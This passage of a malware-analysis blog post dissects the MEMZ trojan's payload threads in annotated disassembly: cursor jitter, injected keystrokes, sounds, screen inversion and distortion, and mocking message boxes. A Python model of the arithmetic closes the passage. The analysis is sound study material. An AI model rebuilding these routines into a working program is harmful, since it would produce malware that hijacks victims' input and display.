.data:0040502C                 dd offset aHttpGoogleCoCk_10 ; "http://google.co.ck/search?q=batch+viru"...
.data:00405030                 dd offset aHttpGoogleCoCk_11 ; "http://google.co.ck/search?q=virus.exe"
.data:00405034                 dd offset aHttpGoogleCoCk_12 ; "http://google.co.ck/search?q=internet+e"...
.data:00405038                 dd offset aHttpGoogleCoCk_13 ; "http://google.co.ck/search?q=facebook+h"...
.data:0040503C                 dd offset aHttpGoogleCoCk_14 ; "http://google.co.ck/search?q=virus+buil"...
.data:00405040                 dd offset aHttpGoogleCoCk_15 ; "http://google.co.ck/search?q=how+to+cre"...
.data:00405044                 dd offset aHttpGoogleCoCk_16 ; "http://google.co.ck/search?q=how+to+rem"...
.data:00405048                 dd offset aHttpGoogleCoCk_17 ; "http://google.co.ck/search?q=my+compute"...
.data:0040504C                 dd offset aHttpGoogleCoCk_18 ; "http://google.co.ck/search?q=dank+memz"
.data:00405050                 dd offset aHttpGoogleCoCk_19 ; "http://google.co.ck/search?q=how+to+dow"...
.data:00405054                 dd offset aHttpGoogleCoCk_20 ; "http://google.co.ck/search?q=half+life+"...
.data:00405058                 dd offset aHttpGoogleCoCk_21 ; "http://google.co.ck/search?q=is+illumin"...
.data:0040505C                 dd offset aHttpGoogleCoCk_22 ; "http://google.co.ck/search?q=montage+pa"...
.data:00405060                 dd offset aHttpGoogleCoCk_23 ; "http://google.co.ck/search?q=the+memz+a"...
.data:00405064                 dd offset aHttpGoogleCoCk_24 ; "http://google.co.ck/search?q=stanky+dan"...
.data:00405068                 dd offset aHttpGoogleCoCk_25 ; "http://google.co.ck/search?q=john+cena+"...
.data:0040506C                 dd offset aHttpGoogleCoCk_26 ; "http://google.co.ck/search?q=vinesauce+"...
.data:00405070                 dd offset aHttpGoogleCoCk_27 ; "http://google.co.ck/search?q=skrillex+s"...
.data:00405074                 dd offset aHttpAnswersMic ; "http://answers.microsoft.com/en-us/prot"...
.data:00405078                 dd offset aHttpMotherboar ; "http://motherboard.vice.com/read/watch-"...
.data:0040507C                 dd offset aHttpPlayClubpe ; "http://play.clubpenguin.com"
.data:00405080                 dd offset aHttpPcoptimize ; "http://pcoptimizerpro.com"
.data:00405084                 dd offset aHttpSoftonicCo ; "http://softonic.com"
.data:00405088                 dd offset aCalc         ; "calc"
.data:0040508C                 dd offset File          ; "notepad"
.data:00405090                 dd offset aCmd          ; "cmd"
.data:00405094                 dd offset aWrite        ; "write"
.data:00405098                 dd offset aRegedit      ; "regedit"
.data:0040509C                 dd offset aExplorer     ; "explorer"
.data:004050A0                 dd offset aTaskmgr      ; "taskmgr"
.data:004050A4                 dd offset aMsconfig     ; "msconfig"
.data:004050A8                 dd offset aMspaint      ; "mspaint"
.data:004050AC                 dd offset aDevmgmtMsc   ; "devmgmt.msc"
.data:004050B0                 dd offset aControl      ; "control"
.data:004050B4                 dd offset aMmc          ; "mmc"
```
Thread 2:
Jitters the mouse. It reads the cursor position, derives a step range of arg_4 / 2200 + 2, draws a random magnitude for y and for x within that range and a random direction (-1, 0 or +1) for each, and calls SetCursorPos; the jitter therefore grows as arg_4 grows. Returns 2.
```asm
.text:0040156D                 push    ebp
.text:0040156E                 mov     ebp, esp
.text:00401570                 push    ecx
.text:00401571                 push    ecx
.text:00401572                 push    ebx
.text:00401573                 push    esi
.text:00401574                 push    edi
.text:00401575                 lea     eax, [ebp+Point]
.text:00401578                 push    eax             ; lpPoint
.text:00401579                 call    ds:GetCursorPos
.text:0040157F                 mov     eax, [ebp+arg_4]
.text:00401582                 mov     ecx, 898h
.text:00401587                 cdq
.text:00401588                 idiv    ecx
.text:0040158A                 lea     esi, [eax+2]    ; step range = arg_4 / 2200 + 2
.text:0040158D                 call    sub_401A55
.text:00401592                 cdq
.text:00401593                 idiv    esi
.text:00401595                 mov     edi, edx        ; |dy| = rand % range
.text:00401597                 call    sub_401A55
.text:0040159C                 cdq
.text:0040159D                 idiv    esi
.text:0040159F                 mov     esi, edx        ; |dx| = rand % range
.text:004015A1                 call    sub_401A55
.text:004015A6                 push    3
.text:004015A8                 cdq
.text:004015A9                 pop     ebx
.text:004015AA                 idiv    ebx
.text:004015AC                 dec     edx             ; y direction: rand % 3 - 1
.text:004015AD                 imul    edx, edi
.text:004015B0                 add     edx, [ebp+Point.y]
.text:004015B3                 push    edx             ; Y
.text:004015B4                 call    sub_401A55
.text:004015B9                 cdq
.text:004015BA                 idiv    ebx
.text:004015BC                 dec     edx             ; x direction: rand % 3 - 1
.text:004015BD                 imul    edx, esi
.text:004015C0                 add     edx, [ebp+Point.x]
.text:004015C3                 push    edx             ; X
.text:004015C4                 call    ds:SetCursorPos
.text:004015CA                 push    2
.text:004015CC                 pop     eax             ; return 2
.text:004015CD                 pop     edi
.text:004015CE                 pop     esi
.text:004015CF                 pop     ebx
.text:004015D0                 mov     esp, ebp
.text:004015D2                 pop     ebp
.text:004015D3                 retn
.text:004015D3 sub_40156D      endp
```
Thread 3:
Injects keystrokes with SendInput. It fills a single INPUT of type 1 (INPUT_KEYBOARD) with wVk = 0x30 + rand % 0x2A, i.e. virtual-key codes 0x30..0x59: the digits 0-9, the letters A-Y and the unassigned codes 0x3A..0x40. Returns 300 + rand % 400.
```asm
.text:004017A5 pInputs         = tagINPUT ptr -1Ch
.text:004017A5
.text:004017A5                 push    ebp
.text:004017A6                 mov     ebp, esp
.text:004017A8                 sub     esp, 1Ch
.text:004017AB                 mov     [ebp+pInputs.type], 1 ; INPUT_KEYBOARD
.text:004017B2                 call    sub_401A55
.text:004017B7                 push    2Ah ; '*'
.text:004017B9                 pop     ecx
.text:004017BA                 cdq
.text:004017BB                 idiv    ecx
.text:004017BD                 push    1Ch             ; cbSize
.text:004017BF                 lea     eax, [ebp+pInputs]
.text:004017C2                 add     edx, 30h ; '0'  ; wVk = 0x30 + rand % 0x2A
.text:004017C5                 push    eax             ; pInputs
.text:004017C6                 push    1               ; cInputs
.text:004017C8                 mov     word ptr [ebp+pInputs.anonymous_0], dx ; ki.wVk
.text:004017CC                 call    ds:SendInput
.text:004017D2                 call    sub_401A55
.text:004017D7                 cdq
.text:004017D8                 mov     ecx, 190h
.text:004017DD                 idiv    ecx
.text:004017DF                 lea     eax, [edx+12Ch] ; return 300 + rand % 400
.text:004017E5                 mov     esp, ebp
.text:004017E7                 pop     ebp
.text:004017E8                 retn
.text:004017E8 sub_4017A5      endp
```
Thread 4:
Plays a random sound from the pszSound table (index rand % dword_402114, an unsigned div) with PlaySoundA and fdwSound = 1 (SND_ASYNC). Returns 20 + rand % 20.
```asm
.text:004016A0 sub_4016A0      proc near               ; DATA XREF: .data:00405148↓o
.text:004016A0                 push    1               ; fdwSound (SND_ASYNC)
.text:004016A2                 push    0               ; hmod
.text:004016A4                 call    sub_401A55
.text:004016A9                 xor     edx, edx
.text:004016AB                 div     ds:dword_402114 ; rand % (number of sounds)
.text:004016B1                 push    pszSound[edx*4] ; pszSound
.text:004016B8                 call    ds:PlaySoundA
.text:004016BE                 call    sub_401A55
.text:004016C3                 push    14h
.text:004016C5                 cdq
.text:004016C6                 pop     ecx
.text:004016C7                 idiv    ecx
.text:004016C9                 lea     eax, [ecx+edx]  ; return 20 + rand % 20
.text:004016CC                 retn
.text:004016CC sub_4016A0      endp
```
Thread 5:
Inverts the screen. It takes the desktop window's DC and BitBlts the full screen rectangle onto itself with rop 0x00330008, which is NOTSRCCOPY, so every pixel is inverted; this is the colour flipping seen in the run-through. Returns 100.
```asm
.text:004015D4                 push    ebp
.text:004015D5                 mov     ebp, esp
.text:004015D7                 sub     esp, 10h
.text:004015DA                 push    esi
.text:004015DB                 push    edi
.text:004015DC                 call    ds:GetDesktopWindow
.text:004015E2                 mov     edi, eax
.text:004015E4                 push    edi             ; hWnd
.text:004015E5                 call    ds:GetWindowDC
.text:004015EB                 mov     esi, eax
.text:004015ED                 lea     eax, [ebp+Rect]
.text:004015F0                 push    eax             ; lpRect
.text:004015F1                 push    edi             ; hWnd
.text:004015F2                 call    ds:GetWindowRect
.text:004015F8                 mov     eax, [ebp+Rect.bottom]
.text:004015FB                 xor     ecx, ecx
.text:004015FD                 sub     eax, [ebp+Rect.top]
.text:00401600                 push    330008h         ; rop = NOTSRCCOPY (invert)
.text:00401605                 push    ecx             ; y1
.text:00401606                 push    ecx             ; x1
.text:00401607                 push    esi             ; hdcSrc
.text:00401608                 push    eax             ; cy
.text:00401609                 mov     eax, [ebp+Rect.right]
.text:0040160C                 sub     eax, [ebp+Rect.left]
.text:0040160F                 push    eax             ; cx
.text:00401610                 push    ecx             ; y
.text:00401611                 push    ecx             ; x
.text:00401612                 push    esi             ; hdc
.text:00401613                 call    ds:BitBlt       ; whole screen onto itself, inverted
.text:00401619                 push    esi             ; hDC
.text:0040161A                 push    edi             ; hWnd
.text:0040161B                 call    ds:ReleaseDC
.text:00401621                 push    64h ; 'd'
.text:00401623                 pop     eax             ; return 100
.text:00401624                 pop     edi
.text:00401625                 pop     esi
.text:00401626                 mov     esp, ebp
.text:00401628                 pop     ebp
.text:00401629                 retn
.text:00401629 sub_4015D4      endp
```
Thread 6:
Creates a thread running sub_401994 and returns a delay computed from rand % 30 and arg_0. sub_401994 installs a thread-local hook of type 5 (WH_CBT) with callback fn, shows a system-modal MessageBoxW "Still using this computer?" with the caption "lol" (uType 0x1030 = MB_ICONEXCLAMATION | MB_SYSTEMMODAL), and removes the hook once the box is closed. A CBT hook sees the box being activated, which is presumably how fn gets to reposition it.
```asm
.text:0040162A                 push    ebp
.text:0040162B                 mov     ebp, esp
.text:0040162D                 push    ecx
.text:0040162E                 push    ecx
.text:0040162F                 xor     eax, eax
.text:00401631                 push    eax             ; lpThreadId
.text:00401632                 push    eax             ; dwCreationFlags
.text:00401633                 push    eax             ; lpParameter
.text:00401634                 push    offset sub_401994 ; lpStartAddress
.text:00401639                 push    1000h           ; dwStackSize
.text:0040163E                 push    eax             ; lpThreadAttributes
.text:0040163F                 call    ds:CreateThread
.text:00401645                 call    sub_401A55
.text:0040164A                 push    1Eh
.text:0040164C                 cdq
.text:0040164D                 pop     ecx
.text:0040164E                 idiv    ecx
.text:00401650                 mov     [ebp+var_4], edx ; rand % 30
.text:00401653                 fild    [ebp+var_4]
.text:00401656                 fstp    qword ptr [ebp-8]
.text:00401659                 fld     qword ptr [ebp-8]
.text:0040165C                 fild    [ebp+arg_0]
.text:0040165F                 fstp    qword ptr [ebp-8]
.text:00401662                 fld     qword ptr [ebp-8]
.text:00401665                 fmul    ds:dbl_403A28
.text:0040166B                 fadd    ds:dbl_403A30
.text:00401671                 fdivr   ds:dbl_403A88
.text:00401677                 fadd    ds:dbl_403A60
.text:0040167D                 faddp   st(1), st
.text:0040167F                 call    sub_401B09      ; ST(0) -> integer return value
.text:00401684                 mov     esp, ebp
.text:00401686                 pop     ebp
.text:00401687                 retn
.text:00401687 sub_40162A      endp
```

sub_401994, the routine the new thread runs:

```asm
.text:00401994                 push    esi
.text:00401995                 call    ds:GetCurrentThreadId
.text:0040199B                 push    eax             ; dwThreadId
.text:0040199C                 push    0               ; hmod
.text:0040199E                 push    offset fn       ; lpfn
.text:004019A3                 push    5               ; idHook (WH_CBT)
.text:004019A5                 call    ds:SetWindowsHookExW
.text:004019AB                 push    1030h           ; uType (MB_ICONEXCLAMATION | MB_SYSTEMMODAL)
.text:004019B0                 push    offset aLol     ; "lol"
.text:004019B5                 push    offset aStillUsingThis ; "Still using this computer?"
.text:004019BA                 push    0               ; hWnd
.text:004019BC                 mov     esi, eax
.text:004019BE                 call    ds:MessageBoxW
.text:004019C4                 push    esi             ; hhk
.text:004019C5                 call    ds:UnhookWindowsHookEx
.text:004019CB                 xor     eax, eax
.text:004019CD                 pop     esi
.text:004019CE                 retn    4
.text:004019CE sub_401994      endp
```
Thread 7:
Draws icons that follow the mouse. It takes half of SM_CXICON (11) and SM_CYICON (12), loads IDI_ERROR (0x7F01) and DrawIcons it centred on the cursor. Then, if rand % f(arg_0) == 0 (f computed on the FPU and converted by sub_401B09), it also loads IDI_WARNING (0x7F03) and draws it at a random position, rand % dword_405184 by rand % dword_405188, which are presumably the screen width and height saved by start. Returns 2.
```asm
.text:00401866                 push    ebp
.text:00401867                 mov     ebp, esp
.text:00401869                 sub     esp, 14h
.text:0040186C                 push    ebx
.text:0040186D                 push    esi
.text:0040186E                 mov     esi, ds:GetSystemMetrics
.text:00401874                 push    edi
.text:00401875                 push    0Bh             ; nIndex (SM_CXICON)
.text:00401877                 call    esi ; GetSystemMetrics
.text:00401879                 cdq
.text:0040187A                 sub     eax, edx
.text:0040187C                 mov     edi, eax
.text:0040187E                 push    0Ch             ; nIndex (SM_CYICON)
.text:00401880                 sar     edi, 1          ; edi = icon width / 2
.text:00401882                 call    esi ; GetSystemMetrics
.text:00401884                 cdq
.text:00401885                 sub     eax, edx
.text:00401887                 mov     esi, eax
.text:00401889                 sar     esi, 1          ; esi = icon height / 2
.text:0040188B                 call    ds:GetDesktopWindow
.text:00401891                 push    eax             ; hWnd
.text:00401892                 mov     [ebp+hWnd], eax
.text:00401895                 call    ds:GetWindowDC
.text:0040189B                 mov     ebx, eax
.text:0040189D                 lea     eax, [ebp+Point]
.text:004018A0                 push    eax             ; lpPoint
.text:004018A1                 call    ds:GetCursorPos
.text:004018A7                 push    7F01h           ; lpIconName (IDI_ERROR)
.text:004018AC                 push    0               ; hInstance
.text:004018AE                 call    ds:LoadIconW
.text:004018B4                 push    eax             ; hIcon
.text:004018B5                 mov     eax, [ebp+Point.y]
.text:004018B8                 sub     eax, esi
.text:004018BA                 push    eax             ; Y
.text:004018BB                 mov     eax, [ebp+Point.x]
.text:004018BE                 sub     eax, edi
.text:004018C0                 mov     edi, ds:DrawIcon
.text:004018C6                 push    eax             ; X
.text:004018C7                 push    ebx             ; hDC
.text:004018C8                 call    edi ; DrawIcon  ; error icon centred on the cursor
.text:004018CA                 call    sub_401A55
.text:004018CF                 fild    [ebp+arg_0]
.text:004018D2                 mov     esi, eax
.text:004018D4                 fstp    [ebp+var_14]
.text:004018D7                 fld     [ebp+var_14]
.text:004018DA                 fdiv    ds:dbl_403A78
.text:004018E0                 fld1
.text:004018E2                 fadd    st(1), st
.text:004018E4                 fld     ds:dbl_403A50
.text:004018EA                 fdivrp  st(2), st
.text:004018EC                 faddp   st(1), st
.text:004018EE                 call    sub_401B09
.text:004018F3                 mov     ecx, eax
.text:004018F5                 mov     eax, esi
.text:004018F7                 cdq
.text:004018F8                 idiv    ecx
.text:004018FA                 test    edx, edx        ; rand % f(arg_0) == 0 ?
.text:004018FC                 jnz     short loc_401928
.text:004018FE                 push    7F03h           ; lpIconName (IDI_WARNING)
.text:00401903                 push    edx             ; hInstance
.text:00401904                 call    ds:LoadIconW
.text:0040190A                 push    eax             ; hIcon
.text:0040190B                 call    sub_401A55
.text:00401910                 cdq
.text:00401911                 idiv    dword_405188
.text:00401917                 push    edx             ; Y (random over the screen height)
.text:00401918                 call    sub_401A55
.text:0040191D                 cdq
.text:0040191E                 idiv    dword_405184
.text:00401924                 push    edx             ; X (random over the screen width)
.text:00401925                 push    ebx             ; hDC
.text:00401926                 call    edi ; DrawIcon
.text:00401928
.text:00401928 loc_401928:                             ; CODE XREF: sub_401866+96↑j
.text:00401928                 push    ebx             ; hDC
.text:00401929                 push    [ebp+hWnd]      ; hWnd
.text:0040192C                 call    ds:ReleaseDC
.text:00401932                 push    2
.text:00401934                 pop     eax             ; return 2
.text:00401935                 pop     edi
.text:00401936                 pop     esi
.text:00401937                 pop     ebx
.text:00401938                 mov     esp, ebp
.text:0040193A                 pop     ebp
.text:0040193B                 retn
.text:0040193B sub_401866      endp
```
Thread 8:
Enumerates all child windows of the desktop with EnumChildWindows, calling EnumFunc (not shown here) for each one. Returns 50.
```asm
.text:00401688 sub_401688      proc near               ; DATA XREF: .data:00405168↓o
.text:00401688                 push    0               ; lParam
.text:0040168A                 push    offset EnumFunc ; lpEnumFunc
.text:0040168F                 call    ds:GetDesktopWindow
.text:00401695                 push    eax             ; hWndParent
.text:00401696                 call    ds:EnumChildWindows
.text:0040169C                 push    32h ; '2'
.text:0040169E                 pop     eax             ; return 50
.text:0040169F                 retn
.text:0040169F sub_401688      endp
```
Thread 9:
Shrinks the screen image into itself. It StretchBlts the full screen (0, 0, width, height) onto a destination rectangle inset by 50 px on each side ((50, 50), width-100 by height-100) with SRCCOPY (0x00CC0020), so every call pulls the picture further inward. The return value is computed from arg_0.
```asm
.text:004017E9                 push    ebp
.text:004017EA                 mov     ebp, esp
.text:004017EC                 sub     esp, 18h
.text:004017EF                 push    esi
.text:004017F0                 push    edi
.text:004017F1                 call    ds:GetDesktopWindow
.text:004017F7                 mov     edi, eax
.text:004017F9                 push    edi             ; hWnd
.text:004017FA                 call    ds:GetWindowDC
.text:00401800                 mov     esi, eax
.text:00401802                 lea     eax, [ebp+Rect]
.text:00401805                 push    eax             ; lpRect
.text:00401806                 push    edi             ; hWnd
.text:00401807                 call    ds:GetWindowRect
.text:0040180D                 mov     eax, [ebp+Rect.bottom]
.text:00401810                 mov     ecx, [ebp+Rect.right]
.text:00401813                 push    0CC0020h        ; rop = SRCCOPY
.text:00401818                 push    eax             ; hSrc (full screen height)
.text:00401819                 push    ecx             ; wSrc (full screen width)
.text:0040181A                 push    0               ; ySrc
.text:0040181C                 push    0               ; xSrc
.text:0040181E                 push    esi             ; hdcSrc
.text:0040181F                 add     eax, 0FFFFFF9Ch ; height - 100
.text:00401822                 push    eax             ; hDest
.text:00401823                 lea     eax, [ecx-64h]  ; width - 100
.text:00401826                 push    eax             ; wDest
.text:00401827                 push    32h ; '2'       ; yDest
.text:00401829                 push    32h ; '2'       ; xDest
.text:0040182B                 push    esi             ; hdcDest
.text:0040182C                 call    ds:StretchBlt   ; squeeze the whole screen into a 50 px inset rectangle
.text:00401832                 push    esi             ; hDC
.text:00401833                 push    edi             ; hWnd
.text:00401834                 call    ds:ReleaseDC
.text:0040183A                 fild    [ebp+arg_0]
.text:0040183D                 fstp    [ebp+var_8]
.text:00401840                 fld     [ebp+var_8]
.text:00401843                 fdiv    ds:dbl_403A48
.text:00401849                 fadd    ds:dbl_403A30
.text:0040184F                 fdivr   ds:dbl_403A70
.text:00401855                 fadd    ds:dbl_403A40
.text:0040185B                 call    sub_401B09      ; ST(0) -> integer return value
.text:00401860                 pop     edi
.text:00401861                 pop     esi
.text:00401862                 mov     esp, ebp
.text:00401864                 pop     ebp
.text:00401865                 retn
.text:00401865 sub_4017E9      endp
```
Thread 10:
Scrambles random blocks of the screen (it does not change the desktop colour). It picks a random destination (x up to width-100, y up to height-100), a random source point in the same range and a random size up to 600 by 600, and BitBlts that block with SRCCOPY on the desktop DC. The return value is computed from arg_0.
```asm
.text:004016CD                 push    ebp
.text:004016CE                 mov     ebp, esp
.text:004016D0                 sub     esp, 24h
.text:004016D3                 push    ebx
.text:004016D4                 push    esi
.text:004016D5                 push    edi
.text:004016D6                 call    ds:GetDesktopWindow
.text:004016DC                 mov     ebx, eax
.text:004016DE                 push    ebx             ; hWnd
.text:004016DF                 mov     [ebp+hWnd], ebx
.text:004016E2                 call    ds:GetWindowDC
.text:004016E8                 mov     [ebp+hdc], eax
.text:004016EB                 lea     eax, [ebp+Rect]
.text:004016EE                 push    eax             ; lpRect
.text:004016EF                 push    ebx             ; hWnd
.text:004016F0                 call    ds:GetWindowRect
.text:004016F6                 call    sub_401A55
.text:004016FB                 mov     ecx, [ebp+Rect.right]
.text:004016FE                 add     ecx, 0FFFFFF9Ch ; width - 100
.text:00401701                 cdq
.text:00401702                 idiv    ecx
.text:00401704                 mov     [ebp+x], edx    ; dest x = rand % (width - 100)
.text:00401707                 call    sub_401A55
.text:0040170C                 mov     ecx, [ebp+Rect.bottom]
.text:0040170F                 add     ecx, 0FFFFFF9Ch ; height - 100
.text:00401712                 cdq
.text:00401713                 idiv    ecx
.text:00401715                 mov     [ebp+y], edx    ; dest y = rand % (height - 100)
.text:00401718                 call    sub_401A55
.text:0040171D                 mov     ecx, [ebp+Rect.right]
.text:00401720                 add     ecx, 0FFFFFF9Ch
.text:00401723                 cdq
.text:00401724                 idiv    ecx
.text:00401726                 mov     ebx, edx        ; src x
.text:00401728                 call    sub_401A55
.text:0040172D                 mov     ecx, [ebp+Rect.bottom]
.text:00401730                 add     ecx, 0FFFFFF9Ch
.text:00401733                 cdq
.text:00401734                 idiv    ecx
.text:00401736                 mov     edi, edx        ; src y
.text:00401738                 call    sub_401A55
.text:0040173D                 cdq
.text:0040173E                 mov     ecx, 258h
.text:00401743                 idiv    ecx
.text:00401745                 mov     esi, edx        ; cx = rand % 600
.text:00401747                 call    sub_401A55
.text:0040174C                 cdq
.text:0040174D                 mov     ecx, 258h
.text:00401752                 idiv    ecx             ; cy = rand % 600
.text:00401754                 push    0CC0020h        ; rop = SRCCOPY
.text:00401759                 push    edi             ; y1
.text:0040175A                 push    ebx             ; x1
.text:0040175B                 mov     ebx, [ebp+hdc]
.text:0040175E                 push    ebx             ; hdcSrc
.text:0040175F                 push    edx             ; cy
.text:00401760                 push    esi             ; cx
.text:00401761                 push    [ebp+y]         ; y
.text:00401764                 push    [ebp+x]         ; x
.text:00401767                 push    ebx             ; hdc
.text:00401768                 call    ds:BitBlt       ; copy a random screen block to a random spot
.text:0040176E                 push    ebx             ; hDC
.text:0040176F                 push    [ebp+hWnd]      ; hWnd
.text:00401772                 call    ds:ReleaseDC
.text:00401778                 fild    [ebp+arg_0]
.text:0040177B                 fstp    qword ptr [ebp-14h]
.text:0040177E                 fld     qword ptr [ebp-14h]
.text:00401781                 fdiv    ds:dbl_403A48
.text:00401787                 fadd    ds:dbl_403A30
.text:0040178D                 fdivr   ds:dbl_403A70
.text:00401793                 fadd    ds:dbl_403A38
.text:00401799                 call    sub_401B09      ; ST(0) -> integer return value
.text:0040179E                 pop     edi
.text:0040179F                 pop     esi
.text:004017A0                 pop     ebx
.text:004017A1                 mov     esp, ebp
.text:004017A3                 pop     ebp
.text:004017A4                 retn
.text:004017A4 sub_4016CD      endp
```
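The three payloads whose arithmetic is fully visible above (threads 2, 3 and 7: mouse, keyboard and icon) re-implemented in Python with an injectable random source, so the ranges they can produce can be checked offline. This is an added example, not code from the post or from the sample; `fixed` stands in for sub_401A55, and treating arg_4 as an elapsed-time counter is an assumption, marked as such in the code.

```python
"""Offline model of the MEMZ mouse, keyboard and icon payloads.

Added example, not code from the post or the sample. Each function mirrors
the integer arithmetic in the disassembly above; the random source is
injected so results are reproducible. Assumption: arg_4 of the mouse routine
is an elapsed-time counter (the page shows it only as a divisor).
"""
from typing import Callable, Iterable

Rand = Callable[[], int]      # stands in for sub_401A55 (non-negative int)


def fixed(values: Iterable[int]) -> Rand:
    """Deterministic stand-in for sub_401A55: hands out the given values in order."""
    it = iter(values)
    return lambda: next(it)


def keystroke_vk(rand: Rand) -> int:
    """Thread 3: wVk = 0x30 + rand % 0x2A, i.e. codes 0x30..0x59."""
    return 0x30 + rand() % 0x2A


def keystroke_delay(rand: Rand) -> int:
    """Thread 3 return value: 300 + rand % 400."""
    return 0x12C + rand() % 0x190


def vk_name(vk: int) -> str:
    """What the injected key is: '0'-'9', 'A'-'Z', or an unassigned VK code."""
    if 0x30 <= vk <= 0x39 or 0x41 <= vk <= 0x5A:
        return chr(vk)
    return f"VK_{vk:#04x}(unassigned)"


def keystroke_alphabet() -> list[str]:
    """Every key thread 3 can inject, by sweeping the whole modulus."""
    return [vk_name(0x30 + i) for i in range(0x2A)]


def cursor_jitter(pos: tuple[int, int], elapsed: int, rand: Rand) -> tuple[int, int]:
    """Thread 2: move the cursor by a random step whose range grows with `elapsed`.

    Mirrors the order of the sub_401A55 calls in the disassembly: |dy|, |dx|,
    then the y direction and the x direction (rand % 3 - 1, so -1/0/+1).
    `elapsed` stands in for arg_4 (assumption, see module docstring).
    """
    step_range = elapsed // 0x898 + 2        # idiv by 2200, then lea esi, [eax+2]
    dy_mag = rand() % step_range
    dx_mag = rand() % step_range
    y = pos[1] + (rand() % 3 - 1) * dy_mag
    x = pos[0] + (rand() % 3 - 1) * dx_mag
    return x, y


def icon_origin(cursor: tuple[int, int], icon_w: int = 32, icon_h: int = 32) -> tuple[int, int]:
    """Thread 7: DrawIcon origin that centres the IDI_ERROR icon on the cursor.

    The cdq / sub / sar sequence is a signed halving of SM_CXICON and SM_CYICON;
    32 px is the usual value of both metrics and is only a default here.
    """
    return cursor[0] - icon_w // 2, cursor[1] - icon_h // 2


if __name__ == "__main__":
    import random
    rng = random.Random(1)
    rand = lambda: rng.getrandbits(31)
    print("keys:", "".join(k if len(k) == 1 else "?" for k in keystroke_alphabet()))
    print("cursor at t=0:", cursor_jitter((500, 400), 0, rand))
    print("cursor at t=60000:", cursor_jitter((500, 400), 60000, rand))
    print("icon origin:", icon_origin((500, 400)))
```

Sweeping the keyboard modulus shows the injected keys are exactly the digits, the letters A through Y (never Z) and seven unassigned codes, which is a useful thing to know when reading keystroke telemetry from an infected host. The cursor model makes the growth visible: at elapsed 0 the step range is 2, so the cursor moves at most one pixel per call, while at 22000 it is 12.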
Author: Na1r
Link:
Licence: unless otherwise stated, all articles on this blog are released under the BY-NC-SA licence. Please credit the source when reposting!